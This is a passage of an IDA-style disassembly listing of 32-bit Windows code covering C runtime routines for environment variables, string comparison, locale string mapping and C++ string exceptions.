jmp short loc_4225C6
; ---------------------------------------------------------------------------
loc_422594: ; CODE XREF: sub_422492+BD�j
; sub_422492+C2�j
test ebx, ebx
jnz short loc_422612
test esi, esi
jge short loc_42259E
neg esi
loc_42259E: ; CODE XREF: sub_422492+108�j
lea eax, ds:8[esi*4]
push eax
push edi
call sub_41944F
pop ecx
test eax, eax
pop ecx
jz loc_4224F6
mov ecx, [ebp+arg_0]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_4225C1: ; CODE XREF: sub_422492+F8�j
mov ds:dword_48A03C, eax
loc_4225C6: ; CODE XREF: sub_422492+F6�j
; sub_422492+100�j
cmp [ebp+arg_4], 0
jz short loc_422612
push [ebp+arg_0]
call sub_417AB0
inc eax
inc eax
push eax
call sub_417B89
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_422612
push [ebp+arg_0]
push esi
call sub_4179C0
mov eax, esi
pop ecx
sub eax, [ebp+arg_0]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
push esi
call ds:dword_424004 ; SetEnvironmentVariableA
push esi
call sub_417C3B
pop ecx
loc_422612: ; CODE XREF: sub_422492+6E�j
; sub_422492+104�j ...
xor eax, eax
jmp loc_4224F9
sub_422492 endp
; =============== S U B R O U T I N E =======================================
sub_422619 proc near ; CODE XREF: sub_422492+B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ds:dword_48A03C
push edi
mov eax, [esi]
test eax, eax
jz short loc_422654
mov edi, [esp+8+arg_4]
loc_42262B: ; CODE XREF: sub_422619+39�j
push edi
push eax
push [esp+10h+arg_0]
call sub_42213D
add esp, 0Ch
test eax, eax
jnz short loc_42264A
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_422664
test al, al
jz short loc_422664
loc_42264A: ; CODE XREF: sub_422619+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_42262B
loc_422654: ; CODE XREF: sub_422619+C�j
mov eax, esi
sub eax, ds:dword_48A03C
sar eax, 2
neg eax
loc_422661: ; CODE XREF: sub_422619+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_422664: ; CODE XREF: sub_422619+2B�j
; sub_422619+2F�j
mov eax, esi
sub eax, ds:dword_48A03C
sar eax, 2
jmp short loc_422661
sub_422619 endp
; =============== S U B R O U T I N E =======================================
sub_422671 proc near ; CODE XREF: sub_422492+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_422680
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_422680: ; CODE XREF: sub_422671+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_422692
loc_422688: ; CODE XREF: sub_422671+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_422688
loc_422692: ; CODE XREF: sub_422671+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_417B89
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_4226B3
push 9
call sub_419CDA
pop ecx
loc_4226B3: ; CODE XREF: sub_422671+38�j
mov eax, [edi]
mov ebx, edi
loc_4226B7: ; CODE XREF: sub_422671+5B�j
test eax, eax
jz short loc_4226CE
push eax
add ebx, 4
call sub_42274B
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_4226B7
; ---------------------------------------------------------------------------
loc_4226CE: ; CODE XREF: sub_422671+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_422671 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4226D8 proc near ; CODE XREF: sub_422492+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp ds:dword_48B45C, 0
jnz short loc_4226F3
push [ebp+arg_4]
push [ebp+arg_0]
call sub_418F50
pop ecx
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4226F3: ; CODE XREF: sub_4226D8+A�j
mov ecx, [ebp+arg_0]
loc_4226F6: ; CODE XREF: sub_4226D8+56�j
movzx ax, byte ptr [ecx]
test ax, ax
jz short loc_422739
movzx edx, al
test ds:byte_48B561[edx], 4
jz short loc_422725
mov dl, [ecx+1]
inc ecx
test dl, dl
jz short loc_422730
movzx eax, ax
movzx edx, dl
shl eax, 8
or eax, edx
cmp [ebp+arg_4], eax
jz short loc_422734
jmp short loc_42272D
; ---------------------------------------------------------------------------
loc_422725: ; CODE XREF: sub_4226D8+31�j
movzx edx, ax
cmp [ebp+arg_4], edx
jz short loc_422739
loc_42272D: ; CODE XREF: sub_4226D8+4B�j
inc ecx
jmp short loc_4226F6
; ---------------------------------------------------------------------------
loc_422730: ; CODE XREF: sub_4226D8+39�j
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_422734: ; CODE XREF: sub_4226D8+49�j
lea eax, [ecx-1]
pop ebp
retn
; ---------------------------------------------------------------------------
loc_422739: ; CODE XREF: sub_4226D8+25�j
; sub_4226D8+53�j
movzx edx, ax
mov eax, [ebp+arg_4]
sub eax, edx
neg eax
sbb eax, eax
not eax
and eax, ecx
pop ebp
retn
sub_4226D8 endp
; =============== S U B R O U T I N E =======================================
sub_42274B proc near ; CODE XREF: sub_40A7D7+21�p
; sub_422671+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_422772
push esi
call sub_417AB0
inc eax
push eax
call sub_417B89
pop ecx
test eax, eax
pop ecx
jz short loc_422772
push esi
push eax
call sub_4179C0
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_422772: ; CODE XREF: sub_42274B+7�j
; sub_42274B+1A�j
xor eax, eax
pop esi
retn
sub_42274B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_422780 proc near ; CODE XREF: sub_422863+19�p
; sub_42298A+19�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
xor eax, eax
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
call sub_417AB0
pop ecx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_4046A3
mov eax, esi
pop esi
retn 8
sub_422780 endp
; =============== S U B R O U T I N E =======================================
sub_4227AA proc near ; CODE XREF: _0:004227D5�p
; sub_422858+6�j ...
push esi
mov esi, ecx
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_424CA4
call sub_404667
mov ecx, esi
pop esi
jmp sub_422BA6
sub_4227AA endp
; =============== S U B R O U T I N E =======================================
sub_4227C5 proc near ; DATA XREF: _1:00424CA8�o _1:00424CB8�o ...
mov eax, [ecx+10h]
test eax, eax
jnz short locret_4227D1
mov eax, offset dword_424290
locret_4227D1: ; CODE XREF: sub_4227C5+5�j
retn
sub_4227C5 endp
; ---------------------------------------------------------------------------
loc_4227D2: ; DATA XREF: _1:off_424CA4�o
push esi
mov esi, ecx
call sub_4227AA
test byte ptr [esp+8], 1
jz short loc_4227E8
push esi
call sub_4182AF
pop ecx
loc_4227E8: ; CODE XREF: _0:004227DF�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4227EE proc near ; CODE XREF: sub_422863+29�p
mov eax, offset loc_423122
call sub_418290
push ecx
push ecx
push esi
lea eax, [ebp-10h]
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset dword_424CC0
call sub_422B1F
push dword ptr [ebp+8]
and dword ptr [ebp-4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_424CA4
call sub_4228A0
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_424CB4
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_4227EE endp
; =============== S U B R O U T I N E =======================================
sub_42283C proc near ; DATA XREF: _1:off_424CB4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_422858
test [esp+4+arg_0], 1
jz short loc_422852
push esi
call sub_4182AF
pop ecx
loc_422852: ; CODE XREF: sub_42283C+D�j
mov eax, esi
pop esi
retn 4
sub_42283C endp
; =============== S U B R O U T I N E =======================================
sub_422858 proc near ; CODE XREF: sub_42283C+3�p
; DATA XREF: _1:0042502C�o
mov dword ptr [ecx], offset off_424CB4
jmp sub_4227AA
sub_422858 endp
; =============== S U B R O U T I N E =======================================
sub_422863 proc near ; CODE XREF: sub_404514+13�p
; sub_4046D8+E�p
mov eax, offset loc_423134
call sub_418290
sub esp, 30h
lea eax, [ebp-0Dh]
push eax
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp-20h]
call sub_422780
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_4227EE
push offset dword_425028
lea eax, [ebp-3Ch]
push eax
call sub_422BC9
int 3 ; Trap to Debugger
sub_422863 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4228A0 proc near ; CODE XREF: sub_4227EE+32�p
; sub_4228C0+32�p ...
arg_0 = dword ptr 4
push esi
xor eax, eax
push 0FFFFFFFFh
mov esi, ecx
push eax
push [esp+0Ch+arg_0]
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
call sub_404514
mov eax, esi
pop esi
retn 4
sub_4228A0 endp
; =============== S U B R O U T I N E =======================================
sub_4228C0 proc near ; CODE XREF: sub_42298A+29�p
mov eax, offset loc_423146
call sub_418290
push ecx
push ecx
push esi
lea eax, [ebp-10h]
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset dword_424CC0
call sub_422B1F
push dword ptr [ebp+8]
and dword ptr [ebp-4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_424CA4
call sub_4228A0
mov ecx, [ebp-0Ch]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_4228C0 endp
; =============== S U B R O U T I N E =======================================
sub_422908 proc near ; CODE XREF: sub_422972+7�p
; sub_4229CE+7�p ...
mov eax, offset loc_423158
call sub_418290
push ecx
push esi
push edi
mov edi, [ebp+8]
mov esi, ecx
push edi
mov [ebp-10h], esi
call sub_422B5C
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_424CA4
call sub_4228A0
mov ecx, [ebp-0Ch]
pop edi
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_422908 endp
; =============== S U B R O U T I N E =======================================
sub_42294B proc near ; DATA XREF: _1:off_424CE0�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_422967
test [esp+4+arg_0], 1
jz short loc_422961
push esi
call sub_4182AF
pop ecx
loc_422961: ; CODE XREF: sub_42294B+D�j
mov eax, esi
pop esi
retn 4
sub_42294B endp
; =============== S U B R O U T I N E =======================================
sub_422967 proc near ; CODE XREF: sub_42294B+3�p
; DATA XREF: _1:004250D4�o
mov dword ptr [ecx], offset off_424CE0
jmp sub_4227AA
sub_422967 endp
; =============== S U B R O U T I N E =======================================
sub_422972 proc near ; CODE XREF: sub_4229E6+46�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_422908
mov dword ptr [esi], offset off_424CB4
mov eax, esi
pop esi
retn 4
sub_422972 endp
; =============== S U B R O U T I N E =======================================
sub_42298A proc near ; CODE XREF: sub_404464+15�p
; sub_4044BD+15�p ...
mov eax, offset loc_42316A
call sub_418290
sub esp, 30h
lea eax, [ebp-0Dh]
push eax
push offset aStringTooLong ; "string too long"
lea ecx, [ebp-20h]
call sub_422780
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_4228C0
push offset dword_4250D0
lea eax, [ebp-3Ch]
push eax
mov dword ptr [ebp-3Ch], offset off_424CE0
call sub_422BC9
int 3 ; Trap to Debugger
sub_42298A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4229CE proc near ; CODE XREF: sub_4229E6+28�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_422908
mov dword ptr [esi], offset off_424CE0
mov eax, esi
pop esi
retn 4
sub_4229CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4229E6 proc near ; DATA XREF: _1:00424CAC�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_422908
push offset dword_425110
lea eax, [ebp+var_1C]
push eax
call sub_422BC9
int 3 ; Trap to Debugger
loc_422A04: ; DATA XREF: _1:00424CE8�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_4229CE
push offset dword_4250D0
lea eax, [ebp+var_1C]
push eax
call sub_422BC9
int 3 ; Trap to Debugger
loc_422A22: ; DATA XREF: _1:00424CBC�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_422972
push offset dword_425028
lea eax, [ebp+var_1C]
push eax
call sub_422BC9
int 3 ; Trap to Debugger
sub_4229E6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_422A40 proc near ; CODE XREF: sub_40494F+6C�p
jmp ds:dword_4241D8
sub_422A40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_422A46 proc near ; CODE XREF: sub_403DF6+5E�p
; sub_4053D5+159�p
jmp ds:dword_424210
sub_422A46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_422A4C proc near ; CODE XREF: sub_417EFC+23�p
; sub_4181A0+13�p
jmp ds:dword_424188
sub_422A4C endp
; =============== S U B R O U T I N E =======================================
sub_422A52 proc near ; CODE XREF: sub_409392+E2�p
; sub_409392+F9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp ds:dword_48A0A8, 0
push ebx
jnz short loc_422A98
mov edx, [esp+4+arg_4]
mov ecx, [esp+4+arg_0]
loc_422A64: ; CODE XREF: sub_422A52+42�j
mov bx, [ecx]
cmp bx, 5Ah
ja short loc_422A76
cmp bx, 41h
jb short loc_422A76
add ebx, 20h
loc_422A76: ; CODE XREF: sub_422A52+19�j
; sub_422A52+1F�j
mov ax, [edx]
cmp ax, 5Ah
ja short loc_422A88
cmp ax, 41h
jb short loc_422A88
add eax, 20h
loc_422A88: ; CODE XREF: sub_422A52+2B�j
; sub_422A52+31�j
inc ecx
inc ecx
inc edx
inc edx
test bx, bx
jz short loc_422AC8
cmp bx, ax
jz short loc_422A64
jmp short loc_422AC8
; ---------------------------------------------------------------------------
loc_422A98: ; CODE XREF: sub_422A52+8�j
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, [esp+0Ch+arg_4]
loc_422AA2: ; CODE XREF: sub_422A52+72�j
mov ax, [esi]
inc esi
push eax
inc esi
call sub_422C03
mov ebx, eax
mov ax, [edi]
inc edi
push eax
inc edi
call sub_422C03
pop ecx
test bx, bx
pop ecx
jz short loc_422AC6
cmp bx, ax
jz short loc_422AA2
loc_422AC6: ; CODE XREF: sub_422A52+6D�j
pop edi
pop esi
loc_422AC8: ; CODE XREF: sub_422A52+3D�j
; sub_422A52+44�j
movzx ecx, ax
movzx eax, bx
sub eax, ecx
pop ebx
retn
sub_422A52 endp
; =============== S U B R O U T I N E =======================================
sub_422AD2 proc near ; CODE XREF: _0:00422AEA�p
mov dword ptr [ecx], offset off_424D00
mov ecx, [ecx+4]
test ecx, ecx
jz short locret_422AE6
push ecx
call sub_417C3B
pop ecx
locret_422AE6: ; CODE XREF: sub_422AD2+B�j
retn
sub_422AD2 endp
; ---------------------------------------------------------------------------
loc_422AE7: ; DATA XREF: _1:off_424D00�o
push esi
mov esi, ecx
call sub_422AD2
test byte ptr [esp+8], 1
jz short loc_422AFD
push esi
call sub_4182AF
pop ecx
loc_422AFD: ; CODE XREF: _0:00422AF4�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_422B03: ; DATA XREF: _1:off_424D08�o
push esi
mov esi, ecx
call sub_422BA6
test byte ptr [esp+8], 1
jz short loc_422B19
push esi
call sub_4182AF
pop ecx
loc_422B19: ; CODE XREF: _0:00422B10�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_422B1F proc near ; CODE XREF: sub_4227EE+1D�p
; sub_4228C0+1D�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_424D08
push dword ptr [edi]
call sub_417AB0
inc eax
push eax
call sub_4185F5
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_422B4E
push dword ptr [edi]
push eax
call sub_4179C0
pop ecx
pop ecx
loc_422B4E: ; CODE XREF: sub_422B1F+23�j
mov dword ptr [esi+8], 1
mov eax, esi
pop edi
pop esi
retn 4
sub_422B1F endp
; =============== S U B R O U T I N E =======================================
sub_422B5C proc near ; CODE XREF: sub_422908+16�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_424D08
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_422B99
push dword ptr [edi+4]
call sub_417AB0
inc eax
push eax
call sub_4185F5
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_422B9F
push dword ptr [edi+4]
push eax
call sub_4179C0
pop ecx
pop ecx
jmp short loc_422B9F
; ---------------------------------------------------------------------------
loc_422B99: ; CODE XREF: sub_422B5C+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_422B9F: ; CODE XREF: sub_422B5C+2E�j
; sub_422B5C+3B�j
mov eax, esi
pop edi
pop esi
retn 4
sub_422B5C endp
; =============== S U B R O U T I N E =======================================
sub_422BA6 proc near ; CODE XREF: sub_4227AA+16�j
; _0:00422B06�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_424D08
jz short locret_422BBB
push dword ptr [ecx+4]
call sub_4182AF
pop ecx
locret_422BBB: ; CODE XREF: sub_422BA6+A�j
retn
sub_422BA6 endp
; =============== S U B R O U T I N E =======================================
sub_422BBC proc near ; DATA XREF: _1:00424D0C�o
mov eax, [ecx+4]
test eax, eax
jnz short locret_422BC8
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_422BC8: ; CODE XREF: sub_422BBC+5�j
retn
sub_422BBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422BC9 proc near ; CODE XREF: sub_422863+37�p
; sub_42298A+3E�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_424D28
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call ds:dword_4241BC ; RaiseException
pop edi
pop esi
leave
retn 8
sub_422BC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422C03 proc near ; CODE XREF: sub_422A52+56�p
; sub_422A52+63�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp ax, 0FFFFh
jnz short loc_422C15
or ax, ax
leave
retn
; ---------------------------------------------------------------------------
loc_422C15: ; CODE XREF: sub_422C03+B�j
cmp ds:dword_48A0A8, 0
jnz short loc_422C2F
cmp ax, 41h
jb short locret_422C76
cmp ax, 5Ah
ja short locret_422C76
add eax, 20h
leave
retn
; ---------------------------------------------------------------------------
loc_422C2F: ; CODE XREF: sub_422C03+19�j
cmp ax, 100h
jnb short loc_422C49
push 1
push eax
call sub_422EB1
pop ecx
test eax, eax
pop ecx
jnz short loc_422C49
mov ax, word ptr [ebp+arg_0]
leave
retn
; ---------------------------------------------------------------------------
loc_422C49: ; CODE XREF: sub_422C03+30�j
; sub_422C03+3E�j
push 0
lea eax, [ebp+var_2]
push 1
push eax
lea eax, [ebp+arg_0]
push 1
push eax
push 100h
push ds:dword_48A0A8
call sub_422C78
add esp, 1Ch
test eax, eax
mov ax, word ptr [ebp+arg_0]
jz short locret_422C76
mov ax, [ebp+var_2]
locret_422C76: ; CODE XREF: sub_422C03+1F�j
; sub_422C03+25�j ...
leave
retn
sub_422C03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422C78 proc near ; CODE XREF: sub_422C03+5F�p
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424D48
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor esi, esi
cmp ds:dword_48A304, esi
jnz short loc_422CEE
push esi
push esi
push 1
pop ebx
push ebx
push offset dword_4248D8
mov edi, 100h
push edi
push esi
call ds:dword_4241C8 ; LCMapStringW
test eax, eax
jz short loc_422CCC
mov ds:dword_48A304, ebx
jmp short loc_422CEE
; ---------------------------------------------------------------------------
loc_422CCC: ; CODE XREF: sub_422C78+4A�j
push esi
push esi
push ebx
push offset dword_43C824
push edi
push esi
call ds:dword_4241C4 ; LCMapStringA
test eax, eax
jz loc_422E6D
mov ds:dword_48A304, 2
loc_422CEE: ; CODE XREF: sub_422C78+2E�j
; sub_422C78+52�j
cmp [ebp+arg_C], esi
jle short loc_422D03
push [ebp+arg_C]
push [ebp+arg_8]
call sub_422E81
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_422D03: ; CODE XREF: sub_422C78+79�j
mov eax, ds:dword_48A304
cmp eax, 1
jnz short loc_422D2A
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C8 ; LCMapStringW
jmp loc_422E6F
; ---------------------------------------------------------------------------
loc_422D2A: ; CODE XREF: sub_422C78+93�j
cmp eax, 2
jnz loc_422E6D
cmp [ebp+arg_18], esi
jnz short loc_422D40
mov eax, ds:dword_48A0B8
mov [ebp+arg_18], eax
loc_422D40: ; CODE XREF: sub_422C78+BE�j
push esi
push esi
push esi
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push 220h
push [ebp+arg_18]
call ds:dword_424150 ; WideCharToMultiByte
mov [ebp+var_20], eax
cmp eax, esi
jz loc_422E6D
mov [ebp+var_4], esi
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_1C], eax
jmp short loc_422D86
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
mov [ebp+var_1C], esi
loc_422D86: ; CODE XREF: sub_422C78+100�j
or [ebp+var_4], 0FFFFFFFFh
cmp [ebp+var_1C], esi
jz loc_422E6D
push esi
push esi
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_C]
push [ebp+arg_8]
push 220h
push [ebp+arg_18]
call ds:dword_424150 ; WideCharToMultiByte
test eax, eax
jz loc_422E6D
push esi
push esi
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C4 ; LCMapStringA
mov edi, eax
mov [ebp+var_2C], edi
cmp edi, esi
jz loc_422E6D
mov [ebp+var_4], 1
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_422E09
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+var_2C]
loc_422E09: ; CODE XREF: sub_422C78+17D�j
cmp ebx, esi
jz short loc_422E6D
push edi
push ebx
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4241C4 ; LCMapStringA
test eax, eax
jz short loc_422E6D
test byte ptr [ebp+arg_4+1], 4
jz short loc_422E47
mov eax, [ebp+arg_14]
cmp eax, esi
jz short loc_422E69
cmp eax, edi
jl short loc_422E38
mov eax, edi
loc_422E38: ; CODE XREF: sub_422C78+1BC�j
push eax
push ebx
push [ebp+arg_10]
call sub_418C10
add esp, 0Ch
jmp short loc_422E69
; ---------------------------------------------------------------------------
loc_422E47: ; CODE XREF: sub_422C78+1B1�j
cmp [ebp+arg_14], esi
jnz short loc_422E50
push esi
push esi
jmp short loc_422E56
; ---------------------------------------------------------------------------
loc_422E50: ; CODE XREF: sub_422C78+1D2�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_422E56: ; CODE XREF: sub_422C78+1D6�j
push edi
push ebx
push 1
push [ebp+arg_18]
call ds:dword_424070 ; MultiByteToWideChar
mov edi, eax
cmp edi, esi
jz short loc_422E6D
loc_422E69: ; CODE XREF: sub_422C78+1B8�j
; sub_422C78+1CD�j
mov eax, edi
jmp short loc_422E6F
; ---------------------------------------------------------------------------
loc_422E6D: ; CODE XREF: sub_422C78+66�j
; sub_422C78+B5�j ...
xor eax, eax
loc_422E6F: ; CODE XREF: sub_422C78+AD�j
; sub_422C78+1F3�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_422C78 endp
; =============== S U B R O U T I N E =======================================
sub_422E81 proc near ; CODE XREF: sub_422C78+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_422EA0
loc_422E91: ; CODE XREF: sub_422E81+1D�j
cmp word ptr [eax], 0
jz short loc_422EA0
inc eax
mov esi, ecx
inc eax
dec ecx
test esi, esi
jnz short loc_422E91
loc_422EA0: ; CODE XREF: sub_422E81+E�j
; sub_422E81+14�j
cmp word ptr [eax], 0
pop esi
jnz short loc_422EAE
sub eax, [esp+arg_0]
sar eax, 1
retn
; ---------------------------------------------------------------------------
loc_422EAE: ; CODE XREF: sub_422E81+24�j
mov eax, edx
retn
sub_422E81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422EB1 proc near ; CODE XREF: sub_422C03+35�p
var_4 = dword ptr -4
arg_0 = word ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFh
jz short loc_422EF1
cmp [ebp+arg_0], 100h
jnb short loc_422ED5
movzx eax, [ebp+arg_0]
mov ecx, ds:off_4395A4
mov ax, [ecx+eax*2]
jmp short loc_422EF8
; ---------------------------------------------------------------------------
loc_422ED5: ; CODE XREF: sub_422EB1+12�j
push 0
lea eax, [ebp+var_4]
push 0
push eax
lea eax, [ebp+arg_0]
push 1
push eax
push 1
call sub_422F03
add esp, 18h
test eax, eax
jnz short loc_422EF5
loc_422EF1: ; CODE XREF: sub_422EB1+A�j
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_422EF5: ; CODE XREF: sub_422EB1+3E�j
mov eax, [ebp+var_4]
loc_422EF8: ; CODE XREF: sub_422EB1+22�j
movzx ecx, [ebp+arg_4]
movzx eax, ax
and eax, ecx
leave
retn
sub_422EB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422F03 proc near ; CODE XREF: sub_422EB1+34�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424D60
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_48A308
xor edi, edi
cmp eax, edi
jnz short loc_422F72
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_4248D8
push esi
call ds:dword_424028 ; GetStringTypeW
test eax, eax
jz short loc_422F50
mov eax, esi
jmp short loc_422F6D
; ---------------------------------------------------------------------------
loc_422F50: ; CODE XREF: sub_422F03+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_43C824
push esi
push edi
call ds:dword_42402C ; GetStringTypeA
test eax, eax
jz loc_4230B4
push 2
pop eax
loc_422F6D: ; CODE XREF: sub_422F03+4B�j
mov ds:dword_48A308, eax
loc_422F72: ; CODE XREF: sub_422F03+2F�j
cmp eax, 1
